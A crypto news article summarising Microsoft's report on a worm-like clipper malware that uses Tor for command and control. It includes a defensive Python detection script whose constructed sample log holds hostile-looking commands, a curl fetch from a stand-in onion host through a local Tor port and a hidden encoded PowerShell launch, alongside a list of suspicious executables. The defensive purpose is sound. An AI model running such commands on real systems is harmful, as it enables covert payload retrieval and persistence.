Microsoft Warns of New Crypto Clipper Malware That Acts Like a Worm

  • The crypto clipper uses Tor for command and control, spreads like a worm, and opens backdoors.
  • With Tor, attackers can hide their infrastructure and make takedowns harder.
  • Attackers have been using malicious shortcut files (.lnk) to infect devices since February 2026.

Microsoft's Threat Intelligence team has published a report on a new, more capable crypto clipper campaign that goes well beyond standard clipboard hijacking.

Unlike older clipper malware that simply swaps cryptocurrency wallet addresses, this campaign routes its command and control over Tor, spreads like a worm, establishes persistence, and opens backdoors, making it a much larger threat.

Crypto clippers used to be considered fairly basic malware. In a typical clipper attack, the victim copies a crypto wallet address, the malware monitors the clipboard and replaces it with the attacker's address, and the victim sends funds to the wrong wallet without noticing.

However, Microsoft's report shows attackers are moving past the old clipper playbook. The newest campaign turns the clipper into a full-blown intrusion tool that can retain access over time, move across networks, hide its tracks, launch further attacks, and support larger criminal schemes.

Tor-Based Command and Control

One of the most notable developments is the use of Tor for command and control. For attackers, that means they can hide where their servers really are, make takedowns harder, blend their traffic in with other encrypted connections, and frustrate attribution when someone tries to trace them.

Traditional malware, by contrast, depended on domains or IP addresses that security teams could eventually block. Tor-based malware can keep switching to new hidden service addresses and stay alive even if part of its infrastructure is taken down.

A further problem is that many companies do not monitor Tor traffic closely. An endpoint that suddenly begins communicating through Tor may indicate malware, data exfiltration, a backdoor, or an attacker issuing commands.

Microsoft reports that since February 2026, attackers have been using malicious shortcut files (.lnk) to infect devices with the crypto clipper. Once inside, it drops two components: one that spreads to other systems, and one that steals wallet information and sends it back to the attackers.

According to the company, security teams should prioritize behavioral detection over static malware signatures. In particular, it is important to investigate systems where scripting engines such as WScript or CScript launch curl, cmd.exe, PowerShell, or other unexpected executables.

Likewise, any traffic to localhost on port 9050 (the default SOCKS port of a local Tor client) combined with unusual script activity is a strong red flag and warrants investigation.
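As an added illustration, not code from Microsoft's report or from the malware itself, the following Python sketches the behavioral correlation the two hunts above describe, run over a few constructed telemetry lines. The pipe-delimited log format, the list of "unexpected" child executables, the example.onion hostname, and the inclusion of port 9150 (assumed to be Tor Browser's SOCKS port) are all assumptions of this example; a real deployment would read process-creation and network events from an EDR or Sysmon instead.

```python
"""Behavioral triage: script hosts spawning tools, plus loopback Tor SOCKS traffic.

Added example, not code from Microsoft's report. Telemetry lines below are
constructed and the log format is hypothetical.
"""
from dataclasses import dataclass

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Children a script host rarely has a legitimate reason to launch (assumed list).
SUSPICIOUS_CHILDREN = {"curl.exe", "cmd.exe", "powershell.exe", "pwsh.exe",
                       "certutil.exe", "mshta.exe", "rundll32.exe", "bitsadmin.exe"}
LOOPBACK = {"127.0.0.1", "::1", "localhost"}
# 9050 is the Tor daemon's default SocksPort; 9150 is assumed here for Tor Browser.
TOR_SOCKS_PORTS = {9050, 9150}


@dataclass
class ProcessEvent:
    host: str
    pid: int
    ppid: int
    parent_image: str
    image: str
    command_line: str


@dataclass
class NetworkEvent:
    host: str
    pid: int
    dest_ip: str
    dest_port: int


@dataclass
class Alert:
    severity: str
    rule: str
    host: str
    pid: int
    detail: str


# Constructed sample telemetry (hypothetical format):
#   time|host|PROC|pid|ppid|parent_image|image|command_line
#   time|host|NET|pid|dest_ip|dest_port
SAMPLE_LOG = """\
10:00:01|WS01|PROC|412|300|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\wscript.exe|wscript.exe C:\\Users\\a\\Downloads\\invoice.vbs
10:00:02|WS01|PROC|418|412|C:\\Windows\\System32\\wscript.exe|C:\\Windows\\System32\\curl.exe|curl.exe -s --socks5-hostname 127.0.0.1:9050 http://example.onion/p
10:00:02|WS01|NET|418|127.0.0.1|9050
10:00:03|WS01|PROC|425|412|C:\\Windows\\System32\\wscript.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -nop -w hidden -enc AAAA
10:05:00|WS02|PROC|900|300|C:\\Windows\\explorer.exe|C:\\Program Files\\Tor Browser\\Browser\\firefox.exe|firefox.exe
10:05:01|WS02|NET|900|127.0.0.1|9150
10:06:00|WS03|PROC|777|300|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\cscript.exe|cscript.exe logon.vbs
"""


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_events(text: str):
    """Split the constructed log into process and network events."""
    procs, nets = [], []
    for line in text.splitlines():
        if not line.strip():
            continue
        kind = line.split("|", 3)[2]
        if kind == "PROC":
            _, host, _, pid, ppid, parent, image, cmd = line.split("|", 7)
            procs.append(ProcessEvent(host, int(pid), int(ppid), parent, image, cmd))
        elif kind == "NET":
            _, host, _, pid, ip, port = line.split("|")
            nets.append(NetworkEvent(host, int(pid), ip, int(port)))
    return procs, nets


def detect(text: str) -> list:
    """Return alerts, escalating loopback Tor traffic tied to script activity."""
    procs, nets = parse_events(text)
    alerts = []
    script_hosts = {(p.host, p.pid) for p in procs if basename(p.image) in SCRIPT_HOSTS}
    script_children = set()
    # Rule 1: a scripting engine launching a tool it has no business launching.
    for p in procs:
        if basename(p.parent_image) in SCRIPT_HOSTS and basename(p.image) in SUSPICIOUS_CHILDREN:
            script_children.add((p.host, p.pid))
            alerts.append(Alert("medium", "script_host_spawn", p.host, p.pid,
                                f"{basename(p.parent_image)} -> {basename(p.image)}: {p.command_line}"))
    # Rule 2: a connection to a local Tor SOCKS port. Alone it is low severity
    # (a user may simply run Tor Browser); from a script host or a rule-1 child
    # it is the combination Microsoft calls a strong red flag.
    for n in nets:
        if n.dest_ip in LOOPBACK and n.dest_port in TOR_SOCKS_PORTS:
            key = (n.host, n.pid)
            linked = key in script_hosts or key in script_children
            alerts.append(Alert("high" if linked else "low",
                                "tor_socks_from_script_activity" if linked else "tor_socks_connect",
                                n.host, n.pid, f"{n.dest_ip}:{n.dest_port}"))
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(f"[{a.severity:6}] {a.rule:32} {a.host} pid={a.pid} {a.detail}")
```

On the sample, WS01 produces two medium alerts for wscript.exe spawning curl and PowerShell and a high alert for the curl process reaching 127.0.0.1:9050, WS02's browser-only Tor use stays low, and WS03's cscript.exe with no suspicious children produces nothing, which is the point of correlating the two signals rather than alerting on either alone.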

Related: Microsoft Flags Two Malicious npm Packages Targeting Crypto Wallets

Disclaimer: The information presented in this article is for informational and educational purposes only. The article does not constitute financial advice or advice of any kind. Coin Edition is not responsible for any losses incurred as a result of the utilization of content, products, or services mentioned. Readers are advised to exercise caution before taking any action related to the company.